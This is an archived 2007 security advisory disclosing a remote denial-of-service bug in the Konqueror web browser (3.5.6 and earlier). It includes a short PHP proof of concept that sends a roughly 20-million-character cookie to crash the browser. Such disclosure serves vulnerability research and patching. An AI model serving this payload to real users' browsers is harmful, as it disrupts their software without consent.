Konqueror Remote Denial Of Service

From: laurent.gaffie@xxxxxxxxx
Date: 14 Nov 2007 15:33:10 -0000

Application: Konqueror <= 3.5.6
Web Site: http://www.konqueror.org/
Platform: Unix
Bug: Remote Denial of service

-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========

"Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)."

======
2) Bug
======

Konqueror doesn't handle big cookies, so when a big cookie is sended , konqueror will crash.

=====
3)Proof of concept
=====

Proof of concept example :

<?php
ini_set("memory_limit","200M");
setcookie("hi_fox", str_repeat("A",19999999));
?>

========
4)Greets
========
Berga,team soh, #futurezone, #soh

=====
5)Credits
=====
laurent gaffié

Prev by Date: DocuSafe "Search" SQL Injection
Next by Date: Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0
Previous by thread: DocuSafe "Search" SQL Injection
Next by thread: Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0
Index(es):
- Date
- Thread

Relevant Pages

Re: [kde-linux] Cant login to http://bugs.kde.org/
... Konqueror, if you have latest OpenSSL version it should work! ... works fine in Firefox and used to work in Konqueror. ... like a bug. ... Linux registered machine number 351448 ...
(KDE)
Re: [kde-linux] Deleting the Selection
... Click on the konsole window. ... Click on the konqueror window. ... Navigate to a page with at least one image. ... I don't know if this is a Qt bug or a KDE bug but it is fscking annoying. ...
(KDE)
Re: [opensuse] konqueror ftp bug?
... konq creates the folders but when file transfer starts it crashes ... That behavior would not surprise me at all in kde4 konqueror. ... That place to report this is bugs.kde.org. ... that along with your bug report against ftp in konqueror. ...
(SuSE)
Re: [opensuse] konqueror ftp bug?
... When downloading by ftp from a remote site to my own hard disk konq ... That behavior would not surprise me at all in kde4 konqueror. ... That place to report this is bugs.kde.org. ... If someone already has a bug open on it, ...
(SuSE)
Re: [opensuse] konqueror ftp bug?
... When downloading by ftp from a remote site to my own hard disk konq ... That behavior would not surprise me at all in kde4 konqueror. ... report this is bugs.kde.org. ... provide that along with your bug report against ftp in konqueror. ...
(SuSE)